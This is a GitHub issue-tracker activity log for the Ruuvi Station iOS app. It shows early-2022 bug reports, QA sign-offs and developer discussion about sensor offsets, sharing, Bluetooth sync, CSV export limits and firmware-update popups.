[2022-01-11 18:28] laurijamsa commented on #468
Actually, those offset settings should not be visible on iOS. Reason for this is that you are looking for a shared sensor. Only owner of the senaor can adjust offsets. Offsets are applied on sensor data by the client software, and databasea (local and cloud) are raw data without offsets.

[2022-01-11 18:39] priyonto commented on #468
So, the way I understand is - if I am the owner of the sensors I will be able to adjust the offsets from the app and they should reflect on the app, right now in iOS it just shows zero as values. But, if I am not the owner I should not be seeing these items at all just like the android app. Is that correct?

[2022-01-11 18:58] andreevdenis commented on #468
Yes, correct

[2022-01-11 19:11] andreevdenis commented on #468
I've updated task description

[2022-01-12 10:12] priyonto commented on #468
Is there any issue already opened for this part specifically? I can't find one.

[2022-01-12 10:30] laurijamsa commented on #468
I think there is no issue yet about that, let's open one

[2022-01-12 10:37] priyonto opened #670 "Tag settings screen showing offset correction section for the users who is not the owner of the sensor"
Issue:
The offset correction section is showing for the user who is not the owner.

Expected:
The offset correction section should be only visible to the owner.

![IMG_708834D3C74C-1](https://user-images.githubusercontent.com/24395776/149124262-deb0c21a-0f72-4370-b811-89813ed991c4.jpeg)

[2022-01-12 10:37] priyonto commented on #468
Thanks. I have created one. #670

[2022-01-12 15:06] priyonto commented on #650
I have updated the firmware to v3.33.1 on version 0.7.6(206) and was unable to reproduce this issue.
Device: iPhone 11 Pro Max, iOS 15.1

[2022-01-13 08:40] priyonto commented on #650
@markoaamunkajo Would you please try to reproduce it? Thank you.

[2022-01-13 10:46] markoaamunkajo commented on #642
QA passed

[2022-01-13 10:46] #642 closed

[2022-01-13 10:56] markoaamunkajo commented on #583
QA passed

[2022-01-13 10:56] #583 closed

[2022-01-13 11:06] markoaamunkajo commented on #662
QA passed on this card, limiting handled on other card

[2022-01-13 11:06] #662 closed

[2022-01-13 11:08] markoaamunkajo commented on #581
QA passed

[2022-01-13 11:08] #581 closed

[2022-01-13 11:58] markoaamunkajo commented on #596
@priyonto User has signed in to 3 devices on his Ruuvi Cloud account, 1x Android and 2x iPhones.
Iphone 1 OS 14.8.
IPhone 2 OS 15.2.

User adds new sensor and assigns it to cloud on Android device
It is then synced to all devices from cloud
User then deletes the new sensor

Actual:
Iphone 1 - sensor is removed on sync
IPhone 2 - sensor is not removed even after multiple sync

[2022-01-13 12:23] priyonto opened #675 "Signing out does not remove the local sensors"
Actual: Signing out does not remove the local sensors

Expected: Signing out should remove all claimed offline sensors, the sensors that have been updated from the cloud, and sensors someone shared with the user.

[2022-01-13 12:31] markoaamunkajo commented on #670
QA passed

[2022-01-13 12:31] #670 closed

[2022-01-13 12:36] markoaamunkajo commented on #644
QA passed

[2022-01-13 12:36] #644 closed

[2022-01-13 13:00] markoaamunkajo opened #676 "0.7.6(206) Unauthorized error shown on cloud login page after updating fw to sensor"
Unauthorized error shown on cloud login page after updating fw to sensor

Steps:
1. User updated sensor from 2.5.9 df 3 to 3.31.1
2. Sensor page doesn't update to show sensor is now connectable
3. User tries to sign to Ruuvi Cloud
3. Error shown

If I kill app it now sees sensor as connectable and allows sign in

[2022-01-13 13:01] markoaamunkajo commented on #676
Need to reflash some sensors and will try to replicate

[2022-01-14 02:55] markoaamunkajo commented on #676
Cannot replicate, not sure what happened.

[2022-01-14 02:55] #676 closed

[2022-01-14 02:57] markoaamunkajo opened #679 "0.7.6(206) Sensor not showing as connectable immediately after firmware update"
Description:

User updated sensor from 2.5.9 df 3 to 3.31.1
Sensor page doesn't update to show sensor is now connectable

User will need to either 1. kill app 2. remove battery from sensor and re-add it to see it's connectable and sensor page showing charts icon.

[2022-01-14 03:00] markoaamunkajo commented on #650
I cannot reproduce this issue either but I have a feeling this could be related and arises from some older app version https://github.com/ruuvi/com.ruuvi.station.ios/issues/679

Will move this one to done and continue with the mentioned card.

[2022-01-14 03:00] #650 closed

[2022-01-14 03:24] markoaamunkajo opened #680 "0.7.7(233) Virtual sensor resets its values when other sensors added or removed"
Description:

User on iOS 15.2. added virtual sensor to Ruuvi Station.
He then adds a local sensor.

Actual: when he now goes to view his virtual sensor all values are showing "-". If he minimizes app values reappear. If he removes any sensor (local or cloud or sign out from cloud) virtual sensor will again show "-" values.

 Same happens on iOS 14.8 device.

https://user-images.githubusercontent.

[2022-01-14 03:25] markoaamunkajo commented on #680
Should be fixed before release @priyonto

[2022-01-14 03:29] markoaamunkajo commented on #602
@andreevdenis could you check with your iPhone SE?

[2022-01-14 07:36] priyonto commented on #680
Thank you for the reporting. Android does not have the virtual tags though. What will be the eventual step about this, remove virtual tags from iOS or adding virtual tags on android?

[2022-01-14 07:41] laurijamsa commented on #680
We haven't decided yet if this feature will be deprecated eventually or not. Our original reason to launch this feature back in the days was to allow users to try out the app before purchasing physical sensors. But now when we have the Ruuvi Cloud, we could automatically share a couple of demo sensors to new users when they sign in first time.

[2022-01-14 07:44] priyonto commented on #680
I understand. This makes complete sense. If that was the case I believe we can omit this from iOS and make the experience similar to Android. This is pretty big difference in experience.

[2022-01-14 07:49] laurijamsa commented on #680
We have a separate task about adding some missing statistics endpoints. I'm not sure if we currently know how many of out users are actually using these virtual sensors.

[2022-01-14 07:58] priyonto commented on #680
Good point. Then let's fix it and continue this feature until we have those data and make a decision?

[2022-01-14 08:03] laurijamsa commented on #680
Yeah, let's fix this and get back to this decision about possible feature removal later on.

[2022-01-14 08:04] priyonto commented on #680
Perfect. Thank you.

[2022-01-14 08:51] ojousima commented on #679
As a background:
Sensors can send two type of advertisement packets: connectable or non-connectable. These packets further can include a "scan response" data which the phone can request after primary advertisement.

Connectable packets have two flags set: Connectable and Scan Response available. If the device scans the sensor advertisement, connectable sensor will send a scan response. Primary adv

[2022-01-14 09:12] laurijamsa commented on #675
No. Not necessary. We also don't want to start building cloud support for storing information of users' virtual sensors.

[2022-01-14 09:15] priyonto commented on #675
Noted, Thank you.

[2022-01-14 09:23] priyonto commented on #679
@ojousima Thank you for sharing the insights of internal signal processing. This is definitely helpful. :)

[2022-01-14 10:44] andreevdenis commented on #602
Everything is good now

[2022-01-14 10:44] #602 closed

[2022-01-14 10:50] priyonto commented on #618
@markoaamunkajo May I ask you to try to reproduce this, please? I tried several times and could not. Thank you.

[2022-01-14 11:08] markoaamunkajo commented on #680
QA passed

[2022-01-14 11:08] #680 closed

[2022-01-14 11:22] markoaamunkajo commented on #668
QA passed

[2022-01-14 11:22] #668 closed

[2022-01-14 11:26] markoaamunkajo commented on #585
QA passed

[2022-01-14 11:26] #585 closed

[2022-01-14 11:32] markoaamunkajo commented on #547
0.7.7(234) Temperature calibration test with Fahrenheit. Looks like corrected value is not working correctly.
Correction field is asking for current local temperature, then shows corrected value and difference.

https://user-images.githubusercontent.com/50437378/149508517-e97e3d40-6f6d-43ed-96da-265a434ebca1.mov

[2022-01-14 11:35] markoaamunkajo commented on #596
QA passed

[2022-01-14 11:38] markoaamunkajo commented on #468
I believe this is broken due to https://github.com/ruuvi/com.ruuvi.station.ios/issues/547

[2022-01-14 11:50] markoaamunkajo commented on #618
Cannot reproduce. I have a feeling that iPhone 11 Pro Max has been problematic with some other case too, very specific issue regarding this model.

[2022-01-14 11:51] priyonto commented on #618
I have the iPhone 11 Pro Max, and could not produce this issue on my device.

[2022-01-16 23:42] DG12 opened #686 "I add RuuviTag, it disappears, I add, disapears, ... 0.7.7(234)"
<pre>Added ruuvitag 6E29.( "sensor": "E4:D5:6D:EC:6E:29",)
Added photo.
updates by advertisments frequently.
AS I WATCH it gets "un-added", and a different ruuviTag is shown.
 Back to add a sensor and it's there.
Add it and it's back complete with the photo.
BUT after a few seconds it's gone again.
xxx
remove app
-----
install version 0.7.6(206)
add it, wait, wait, still there.

It was registered

[2022-01-17 02:01] markoaamunkajo commented on #618
Let's close this case because user issue has been resolved and we cannot replicate.

[2022-01-17 02:01] #618 closed

[2022-01-20 10:38] markoaamunkajo commented on #675
QA passed

[2022-01-20 10:38] #675 closed

[2022-01-20 11:00] markoaamunkajo commented on #547
QA passed

[2022-01-20 11:00] #547 closed

[2022-01-20 11:10] markoaamunkajo commented on #468
QA passed

[2022-01-20 11:10] #468 closed

[2022-01-20 14:07] priyonto commented on #657
@laurijamsa Android does not have the sync and clear button but the iOS app has. Which one is intended?  Please share your thoughts on this.

[2022-01-20 14:12] andreevdenis commented on #657
I hide sync and clear if last measurement was from the cloud. Use local sensors to compare behavior.

[2022-01-20 14:13] priyonto commented on #657
Thank you @andreevdenis .

[2022-01-20 14:17] laurijamsa commented on #657
Android has clear/sync button available on those nearby Bluetooth sensors that are advertising themselves as connectable ones. If your iOS device is in connected mode with a nearby Bluetooth sensor, I think Android doesn't show the sync/clear buttons on that sensor.

These clear/sync buttons are a bit confusing right now after we have introduced the Ruuvi Cloud. Before, users knew that syncing wou

[2022-01-20 14:20] priyonto commented on #657
@laurijamsa , Thank you for your detailed insight about the whole thing. This is helpful. I was able to reproduce the issue. However, as my tags are connected through iOS, the android app was not showing them and that raised the question from my side. But, it's now clear.

[2022-01-20 15:51] priyonto commented on #643
@markoaamunkajo Is it allowed to sync multiple sensors at the same time? For example, click sync on sensor A, then closed that page, and then click sync on sensor B, and so on. Will the sync operation be concurrent? or only one at a time?

[2022-01-21 03:34] markoaamunkajo opened #694 "0.7.7(236) Local sensor card issues"
Description:

Major issues with local sensor cards.

User installs fresh 0.7.7(236) and adds a single local BT sensor to Ruuvi Station, then opens charts view.
Actual: charts view remains empty and doesn't draw charts, even after trying to perform GATT sync.

More:
Update test: App store version installed, user signed into cloud and had local sensor that showed charts view correctly, then performe

[2022-01-21 03:35] markoaamunkajo commented on #694
_

https://user-images.githubusercontent.com/50437378/150461204-9626e4d3-6ef1-4974-9b28-58301be47c8f.mov

_

[2022-01-21 03:55] markoaamunkajo commented on #643
@priyonto Yes user can sync multiple sensors at the same time independently.

[2022-01-21 11:28] priyonto commented on #643
@markoaamunkajo Noted. The first issue about being stuck on the success message should be fixed on the current dev build 0.7.7(237). However, the second one is a bit tricky and complicated considering how it's currently built. Right now if sync is started and the page is closed, that sync affects all the sensors. What easily can be done is make it not affect other sensors and force "once sensor sy

[2022-01-21 11:43] markoaamunkajo commented on #694
QA passed

[2022-01-21 11:43] #694 closed

[2022-01-21 11:53] markoaamunkajo commented on #657
0.7.7(237) User has a sensor that is shared by a friend and showing the Ruuvi Gateway as source

However on charts page I see a sync button. If I try to sync it I get following error:

![IMG_1243DF076940-1](https://user-images.githubusercontent.com/50437378/150522586-9509a81f-1a3a-4921-9299-367f99c67bbc.jpeg)

[2022-01-21 11:56] markoaamunkajo commented on #582
0.7.7(237) Popup shows code but not the text we wanna see.
![IMG_7881](https://user-images.githubusercontent.com/50437378/150523104-2cd4bb1d-0c85-4425-8174-c4f6f59a0deb.PNG)

[2022-01-21 12:23] priyonto commented on #657
@markoaamunkajo , should we keep these clear and sync buttons for shared sensors?

[2022-01-21 12:27] markoaamunkajo commented on #657
Android has logic to hide sync and clear if last update was from cloud. Maybe that is sufficient?
In my case my shared cloud sensor hasn't been seen for weeks btw, so there is no data available neither way.

[2022-01-21 12:29] priyonto commented on #657
Yes, in iOS this issue occurs only for the shared sensor. And, I think we can hide these buttons if the sensor is shared because they are could data anyway.

[2022-01-21 18:20] laurijamsa commented on #643
Concurrent sync is something we can worry about later I would say. Let's make solo syncing work as well as possible first.

[2022-01-21 18:21] priyonto commented on #643
Agreed. Thank you :)

[2022-01-21 21:27] DG12 opened #701 "Already shared {1^1d}/{10^20d} - 0.7.7 (236)"
After sharing displays
<pre>Already shared {1^1d}/{10^20d}</pre>

[2022-01-23 07:08] markoaamunkajo commented on #582
QA passed

[2022-01-23 07:08] #582 closed

[2022-01-23 07:14] markoaamunkajo commented on #657
0.7.7(241)
@priyonto in case of cloud sensor that is owned by signed in user but signal is not in BT range we are not getting a clean timeout message.

Actual:
1. Sync button pressed
2. Connecting... (extended period of time)
3. BTKit Error shown

![IMG_3898538279E3-1](https://user-images.githubusercontent.com/50437378/150668450-563464c7-c957-4037-8f74-89c15e1c360f.jpeg)

Expected:
Show disconnect

[2022-01-23 07:27] markoaamunkajo commented on #643
0.7.7(241) I have one BT sensor in my scooter outdoors it's signal is about -85dB

User taps sync button and Synchronising... status goes on for at least 1 minute before showing error
BTKit: failed to connect to peripheral in desired interval, button OK

Expected: Timeout is too long for user to understand what is going on. Can timeout be shortened? And show formatted error instead of code.

[2022-01-23 10:51] markoaamunkajo opened #704 "Unification: Cloud Mode"
Description:

We have added a new Cloud Mode toggle to App Settings in Android app based on customer feedback, and now need to add this to iOS app too.

This toggle is visible in App Settings only when user is signed in to Ruuvi cloud and at least one sensor was getting data from the cloud. (It's possible to sign in without Gateway and in this case Cloud mode is useless)

Switching Cloud Mode to e

[2022-01-23 11:38] andreevdenis commented on #704
I've made some corrections to task description.

[2022-01-24 09:10] markoaamunkajo opened #705 "Number of shared sensors doesn't format correctly"
Description:

User has signed to Ruuvi cloud and wants to share sensor. List showing number of sensors shared is formatting incorrectly.
![IMG_7886](https://user-images.githubusercontent.com/50437378/150753544-49a7df0d-5c3e-405a-84af-ff0a760e1709.PNG)

Expected:
Already Shared X/10 (X = number of shared sensors)

[2022-01-24 10:47] priyonto opened #706 "Add backward compatibility for offset correction feature"
This is related to issue #468

In the current dev build the offset correction values affect only the UI layer, not the local database. Hence it's required to add backward compatibility for the users who might have offset corrected values stored on the local database.

[2022-01-24 21:05] DG12 commented on #705
Please see same #701

[2022-01-26 09:22] priyonto commented on #597
This is a duplicate of #643. I am closing this one.

[2022-01-26 09:22] #597 closed

[2022-01-26 09:22] priyonto commented on #506
This is a duplicate of #643. I am closing this one.

[2022-01-26 09:22] #506 closed

[2022-01-27 08:39] priyonto commented on #425
@markoaamunkajo I have been investing this issue for a while and I was not able to reproduce this issue on my device. As you have mentioned, this seems like a hit or miss issue although I have followed the steps you have mentioned here additionally I have just tried to randomly use the app without Bluetooth, and force close and then open again. Worked okay until now.

Device: iPhone 11 Pro Max, iO

[2022-01-27 11:07] priyonto commented on #603
@markoaamunkajo , Thank you for detailed report. I have some interesting findings on the current dev build 0.7.7(244) in contrast to the issues mentioned here.

1. In my testing if a sensor is added already from the device, I can't see it anymore in the add sensor screen. You have mentioned that as a possible solution as well. On the other hand, If a sensor is added to the android app locally, I c

[2022-01-27 13:56] priyonto commented on #604
@markoaamunkajo @laurijamsa I have encountered the issue when a sensor is claimed by someone, and another user added this locally and tries to claim.  What is the expected result here?

[2022-01-27 18:59] andreevdenis commented on #604
In this case you'll get error from backend. Error field will contain masked email of sensor owner.

You need to parse and extract this email from server error message and put it to sensor owner field. Also show message for user:
Sensor already claimed by %masked_email%

Actually I was sure we have localized string for this, but it looks like we don't. And I'm just showing error from server as is.

[2022-01-27 19:14] DG12 opened #710 "Attempt to export sensor with no owner hangs - 0.7.7(247)"
Pro sensor Ruuvi 9FE9: graph shows temperature and humidity from 01/20 through 01/27.

added 2/15/22:   "WIth no owner"

From Sensor Settings tap export.
Animated ruuvi eyecon spins until user aborts app
![RuuviProCantExport](https://user-images.githubusercontent.com/2365961/151427771-e74cb0b6-ddb2-4c0b-84ee-60c8ef605597.jpg)
.
originally submitted against version (244)

[2022-01-28 07:55] priyonto commented on #604
@andreevdenis Thank you for the comment. I was wondering how you showed the masked email on the sensor settings owner field. For example, I have added a local sensor in the device, how do I get the owner of that sensor without hitting the claim API that returns the owner email in the "error" key.

[2022-01-31 08:47] laurijamsa commented on #481
Add also is_signed_in

[2022-01-31 08:48] priyonto commented on #481
This is noted. Thank you.

[2022-01-31 08:52] laurijamsa commented on #481
Seems that signed in was already listed on the original description :)

[2022-01-31 08:53] priyonto commented on #481
Yes, Just noticed. I will move it up as soon as we finish the current list. This is an important one.

[2022-01-31 09:05] andreevdenis commented on #481
Use "signed_in", same as in Android app

[2022-01-31 09:06] priyonto commented on #481
Noted, Thank you :)

[2022-01-31 09:34] laurijamsa opened #711 "CSV export exports more than 10 days of data"
The local database should be a 10 days FIFO, but it seems that in all scenarios it's not.

This is a sample export file that has more than 10 days of data:

[sample-export.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/7969644/sample-export.csv)

[2022-01-31 13:25] DG12 commented on #711
Interesting note . last few days have very few entries.
WHY restrict to 10 days? Would it  be better to restrict to nnnn datapoints
"2022-01-19 18:56:29",2022-01-19T16:56:29.000Z,33.64,12.34,988.97,-0.368,-0.960,0.088,2.974,45,35356,4
"2022-01-19 19:11:31",2022-01-19T17:11:31.000Z,33.60,12.36,988.73,-0.372,-0.960,0.080,2.967,45,35707,4
"2022-01-20 08:53:26",2022-01-20T06:53:26.000Z,37.38,10.12,977

[2022-01-31 13:38] laurijamsa commented on #711
Restrict to 10 days because we have decided that the mobile apps support 10 days history and longer history browsing from the Ruuvi Cloud is possible with the web interface on station.ruuvi.com

This decision may change later at some point, but for now, this seems like a bug with the database pruning.

[2022-01-31 17:38] DG12 commented on #711
Please consider:
I have a remote sensor
[swampFlood](http://mybeacons.info/swampFlood.html)
Which I only visit once a week and ruuvistation.IOS only collects 7 samples during my visit (which are basically the same, i.e. ONE sample). I would really like to see more than the data from one visit.

[2022-01-31 17:48] laurijamsa commented on #711
In this case, it would be a solid solution to download 7 days full local history from the sensor and after that export its CSV file if you'd like to store the history. We're considering if mobile devices could store data to the Ruuvi Cloud in the future, but right now, only Ruuvi Gateways are allowed to do so.

[2022-01-31 17:53] DG12 commented on #711
Thanks. Good idea.
alternate/additional to mobile device -> cloud
could be CSV -> cloud

[2022-02-01 13:51] priyonto commented on #643
@markoaamunkajo , The issue with showing the wrong message is rectified. However, the issue which sometimes being stuck "connecting" state if the tag is out of range has to be investigated more. I have been testing for a few hours today and it's not reproducible consistently. Hence, I advise creating a separate issue for that and keeping eye on that. #657

[2022-02-02 12:27] markoaamunkajo commented on #705
QA passed

[2022-02-02 12:27] #705 closed

[2022-02-02 12:29] markoaamunkajo commented on #643
Agreed
QA passed

[2022-02-02 12:29] #643 closed

[2022-02-02 13:34] markoaamunkajo commented on #657
QA passed

[2022-02-02 13:34] #657 closed

[2022-02-02 13:35] priyonto commented on #460
@rinat-enikeev Would you please share more details on this issue? Thank you.

[2022-02-02 13:36] markoaamunkajo commented on #403
QA passed

[2022-02-02 13:36] #403 closed

[2022-02-02 13:37] markoaamunkajo commented on #599
QA passed

[2022-02-02 13:39] priyonto commented on #586
@laurijamsa Is it related to the cloud mode (#704)?

[2022-02-02 13:42] laurijamsa commented on #586
Not really. @markoaamunkajo Denis asked before if iOS is working correctly or not, please check and report. Assigning to you.

[2022-02-02 13:54] markoaamunkajo commented on #706
QA passed

[2022-02-02 13:54] #706 closed

[2022-02-02 13:57] priyonto commented on #701
This is a duplicate of #705  and it's fixed on 0.7.7(243)

[2022-02-02 13:57] #701 closed

[2022-02-02 13:59] markoaamunkajo commented on #603
@priyonto
1. This info is from user. I believe he is talking about trying to add local sensor to same device where it already exists. However I haven't been able to replicate this issue.

2. Oh so feedback button opening Mail app when user has not configured it will give error? In this case what you suggested makes sense.

[2022-02-02 14:01] priyonto commented on #603
@markoaamunkajo

Thank you for your feedback. If 1 and 3 are not reproducible I believe we can fix the number 2 and move on.

[2022-02-02 14:06] markoaamunkajo commented on #425
Cannot reproduce, moving this to done.

[2022-02-02 14:06] #425 closed

[2022-02-02 14:29] priyonto commented on #488
@markoaamunkajo Is this issue already fixed? I am not sure whether it's referring to the side menu background, but in the current build, I do not find any mismatch between Android and iOS app. Please reconfirm? Thank you.

[2022-02-02 14:44] priyonto commented on #532
I believe right now in the current build 0.7.7(243) this issue does not appear anymore. Would you please check it? @markoaamunkajo

[2022-02-02 16:46] laurijamsa commented on #486
The SVG logo can be downloaded from here: ruuvi.com/media

[2022-02-03 09:23] priyonto commented on #573
This is discussed with @markoaamunkajo and it's not reproducible on the current build. Closed.

[2022-02-03 09:23] #573 closed

[2022-02-03 12:41] markoaamunkajo commented on #532
Confirmed, QA passed

[2022-02-03 12:41] #532 closed

[2022-02-03 13:11] markoaamunkajo commented on #604
QA passed

[2022-02-03 13:11] #604 closed

[2022-02-03 13:50] markoaamunkajo commented on #586
0.7.7(244)
I cannot confirm this after testing some time, but I found that I got 2 of the same readings added at the end of my csv export for the sensor when I connected gateway back and disabled bluetooth on my phone. I don't see this as a bug imo.

[Ruuvi D5E9-220203-2044.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/7995034/Ruuvi.D5E9-220203-2044.csv)

[2022-02-04 07:41] priyonto commented on #460
Discussed with @rinat-enikeev and decided to close it since this issue doesn’t have enough background information. We will open new issue in the future if we find anything.

[2022-02-04 07:41] #460 closed

[2022-02-07 14:01] priyonto commented on #490
@markoaamunkajo Would you mind sharing a bit more details on this issue?

[2022-02-07 17:40] DG12 opened #724 "Enhance the "when connected" alert (iOS)"
IOS should alert on RSSI outside of alert range rather than "when connected".

[2022-02-08 11:20] markoaamunkajo opened #725 "Check GATT sync issue failed to serve in desired interval"
Latest firmware and Appstore prod version

[2022-02-10 07:21] priyonto commented on #537
@markoaamunkajo Would you please have a look at this issue and add more details to it? Thank you very much.

[2022-02-10 12:48] markoaamunkajo commented on #253
Minor difference:

Android report has RSSI
Naming should be name_yyyymmdd-hhmm

[2022-02-10 12:51] markoaamunkajo commented on #488
Moving to done

[2022-02-10 12:51] #488 closed

[2022-02-10 12:56] markoaamunkajo commented on #135
QA passed

[2022-02-10 12:56] #135 closed

[2022-02-10 12:57] markoaamunkajo commented on #481
Nothing to QA moving to done

[2022-02-10 12:57] #481 closed

[2022-02-10 13:02] #603 closed

[2022-02-10 13:04] markoaamunkajo commented on #494
QA passed

[2022-02-10 13:04] #494 closed

[2022-02-10 13:07] markoaamunkajo commented on #586
QA passed

[2022-02-10 13:07] #586 closed

[2022-02-11 00:05] DG12 opened #732 "Share sensor text obscures (Send) - minor 0.7.7(247)"
After tapping on [Type email], the keyboard slides up and hides the (Send) button.
Pressing [return] does not complete the entry.

The text "You can share the sensor...
Seems to have excessive space between the lines.

Although sliding up will  expose the (send) button it not very friendly or intuitive.
![ShareWhereIsSendButton](https://user-images.githubusercontent.com/2365961/153517711-4df36275-

[2022-02-11 02:13] markoaamunkajo commented on #725
1 day data collected, no error showing yet.

[2022-02-11 02:20] markoaamunkajo commented on #567
QA passed

[2022-02-11 02:20] #567 closed

[2022-02-11 02:22] markoaamunkajo commented on #486
QA passed

[2022-02-11 02:22] #486 closed

[2022-02-11 02:22] #482 closed

[2022-02-11 02:23] markoaamunkajo commented on #484
QA passed

[2022-02-11 02:23] #484 closed

[2022-02-11 02:45] markoaamunkajo commented on #537
@priyonto

Virtual sensor foreground setting (Save and load from web)
unnecessary feature for user, comment in card https://github.com/ruuvi/com.ruuvi.station.ios/issues/490

Network pull interval
redundant feature, this option doesn't exist anymore

I will move this card to done because no action required.

[2022-02-11 03:19] markoaamunkajo commented on #546
@priyonto 0.7.7(247) Shared 2.5.9 df3 sensor from other cloud profile and I see data so this issue is likely not valid anymore.

[2022-02-11 03:46] markoaamunkajo opened #733 "0.7.7(247) User logged out but sensors not removed"
Description:

Happened once and trying to replicate this case.
User logged in to same cloud account multiple times on same device. One local BT sensor. Cloud profile has own sensors and shared sensor. User logged out and in one attempt sensor cards were not removed.

Unsure if https://github.com/ruuvi/com.ruuvi.station.ios/issues/546 is related

[2022-02-11 03:51] markoaamunkajo commented on #473
Closing as duplicate of https://github.com/ruuvi/com.ruuvi.station.ios/issues/401

[2022-02-11 03:51] #473 closed

[2022-02-11 03:52] markoaamunkajo commented on #401
Related: https://github.com/ruuvi/com.ruuvi.station.ios/issues/490

[2022-02-11 03:54] markoaamunkajo commented on #490
https://github.com/ruuvi/com.ruuvi.station.ios/issues/473 closed as duplicate

[2022-02-11 07:27] laurijamsa commented on #537
I think this issue cannot be closed yet as it has points that are not completed yet.

[2022-02-12 03:56] DG12 opened #738 "Attempt to reclaim 20BC sql err - 0.7.7 (247)"
login dg@cccu,.us
add a sensor offers 20BC, tap show SQLlite  error 19 with statement
INSERT INTO"Ruuvi_tag_sensors"("id","Mac",... "isClaimed","isCloudSensor")
Values(?,?,?,?
arguments
...20:BC.,...20:BC, 47...uuid..bB56","Ruuvi 20BC",5,1,0,1,NULL,0)
UNIQUE constraint failed:
ruuvi_tag_sensors.id

swipe,,, 20BC shows up! owner dg@cccu.us !
Back to add a sensor, no longer offered !

**
![image](ht

[2022-02-12 03:59] DG12 commented on #584
I can no longer see this issue. I will re-open if it occurs again.

[2022-02-12 03:59] #584 closed

[2022-02-14 09:04] priyonto commented on #738
This issue exists but is not reproducible on my side. Perhaps it's coming from old firmware data format. Another user also reported this earlier. Either way, we will have to keep an eye on it.

![a04ee905-f870-4616-974d-219f224dce98](https://user-images.githubusercontent.com/24395776/153832862-9e04bc75-9c97-4918-a9a5-11589dd97738.jpeg)

[2022-02-14 09:05] priyonto commented on #738
@markoaamunkajo please try to reproduce it from your side. Thank you :)

[2022-02-14 12:53] markoaamunkajo commented on #546
I replicated this with original "-" description it looked like sensor hanged in df3 mode.

[2022-02-14 12:58] markoaamunkajo commented on #733
Figured it out. I had same sensor locally in df3 mode and it has no mac address and as cloud sensor with mac address.

I try to claim the macless sensor, I cannot claim it
Now when I switch data format on sensor it immediately recognised it being the same sensor as the other one

Now I have 2 sensor cards for the same sensor
When I log out from cloud those 2 cards are left in the app

https://user

[2022-02-14 13:06] markoaamunkajo commented on #738
@DG12 Do you remember if this particular sensor would have been running 2.5.9 firmare?

[2022-02-14 13:09] markoaamunkajo commented on #733
Turns out #546 is related because I after this double sensor cards is shown, I minimise app, then bring it back to foreground and I will see all values as "-"

[2022-02-14 20:50] DG12 commented on #738
This sensor is running SW: v3.28.13

[2022-02-15 12:15] laurijamsa opened #739 "Firmware update popups for data format <5 users"
Show the popup in these scenarios:

1) When user browses first time to a sensor that is broadcasting in older than 5 data format. Remember selection if user cancelled.
2) When user tries to claim the ownership and sensor is broadcasting in older than 5 data format. Do not remember selection if user cancelled.

Popup content:

**Seems that your sensor is using an old firmware software version. To a

[2022-02-15 14:42] priyonto commented on #710
@DG12 Is this sensor using DF3?

[2022-02-15 14:57] priyonto commented on #739
I agree with this implementation. However, a long message like these especially the second one will not look good in iOS default popup/alert.

[2022-02-15 15:09] priyonto commented on #605
@andreevdenis Is this actually possible? I thought downgrading was not "normally" possible?

[2022-02-15 15:14] laurijamsa commented on #605
Downgrading is possible over the air but not from 3.x to 2.x firmware. This issue is mostly about 3.2.x to 3.1.x for example.

[2022-02-15 15:18] priyonto commented on #605
I see. So, it's possible to downgrade to minor versions. May I know the process of the downgrade?

[2022-02-15 15:19] priyonto commented on #605
@markoaamunkajo  Would you please do a double check to confirm whether this is already implemented or not? Thank you.

[2022-02-15 15:59] laurijamsa commented on #739
But it works and it seems to be scrollable:

![image](https://user-images.githubusercontent.com/1311912/154099597-05c9cbf9-1d47-4f45-a75b-ad595bda365c.png)

[2022-02-15 16:01] priyonto commented on #739
Yes, it will work. I was referring to how it might look. :)

[2022-02-15 16:11] andreevdenis commented on #605
Process of downgrading is the same as when you just updating fw. But there can be some logic that prevents from downgrading. See the code after checking current sensor fw. Expected logic: if current fw version != Latest available FW then you can update.

[2022-02-15 16:14] priyonto commented on #605
Thank you @andreevdenis :) I will check on it.

[2022-02-15 16:27] priyonto commented on #661
@DG12
This behavior is intentional for the scenarios when a tag is added and not connectable(fetches only advertisements, not heartbits). But, the graph should be available if the sensor is claimed and a gateway is available. Please report back if the chart is not available even after claiming the sensor.

[2022-02-15 21:32] DG12 commented on #739
It might be a good idea to store the version and data format in the cloud.
several reasons including not having to ask user as well a send periodic ( careful there only one per user not per sensor) email explaining new version available.
Actually is there another way for a user tom know about "new and improved" version?

[2022-02-15 21:34] DG12 commented on #605
There is always the erase and flash (I one has the POWER!). :-)

[2022-02-15 21:45] DG12 commented on #661
This seems to be a different behavior than previous.

Consider NO gateway.
User should still be able to chart multiple sensors and graph them each without connecting to any.
Export should include all datapoints available I.e. those received while sensor was in range of the phone as well as those collected for sensor log via sync to sensor

Please send me your email and I will share some sensors wi

[2022-02-15 22:39] DG12 commented on #710
I just removed ad03 and added it , synced with it and attempt to upload.

hangs!

Revised issue title

[2022-02-16 13:25] DG12 opened #741 "Sensor sends unrealistic values must not be displayed"
Sensor 6e29 was working find UNTIL
I dropped it in the snow and an evil cord chewing monster grabbed it :-)

Hex values  943C°C 9C40% FFFFkpa

I suggest that ANY value outside the environmental range be surpassed (including humidity > 100%)
![6e29_broken](https://user-images.githubusercontent.com/2365961/154273761-a705d722-26fa-477a-b44f-4689dc9e0cee.PNG)

![MollyWithCord copy](https://user-images

[2022-02-16 13:33] ojousima commented on #741
This seems like N/A values are getting rendered as physical values

[2022-02-16 14:36] priyonto commented on #710
@DG12 Thank you for testing it and reporting it. Does it work if you claim the sensor?

[2022-02-16 14:39] priyonto commented on #661
Thank you. There are some technical limitations on the iOS side. But, I believe @laurijamsa is the best person to clarify this issue.

[2022-02-16 16:26] DG12 commented on #661
I don't understand. this worked previously. That is before there was a gateway.

[2022-02-16 17:01] DG12 commented on #710
Logout of dg@cccu.us, login to dgerman@real-world-systems.com, shows no owner, claim:'already claimed'

[2022-02-16 17:12] DG12 commented on #710
Logout of dgerman@real-world-systems.com , back to dg@cccu.us.shows no owner, claim:'already claimed'

[2022-02-17 03:56] markoaamunkajo commented on #661
Charts didn't exist for 2.5.9 sensor but I do see csv export has some difficulty collecting all points to report. I have set Settings -> Foreground -> Save Advertisements -> All before testing.

report 1:
[Ruuvi 3C72-220217-1049.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8085420/Ruuvi.3C72-220217-1049.csv)

report 2 (3 minutes later):
[Ruuvi 3C72-220217-1051.csv](https://github.com/

[2022-02-17 07:50] priyonto commented on #661
@markoaamunkajo How frequently advertisements are saved in iOS? Are we storing as many data points as android? Also, was this working previously as expected?

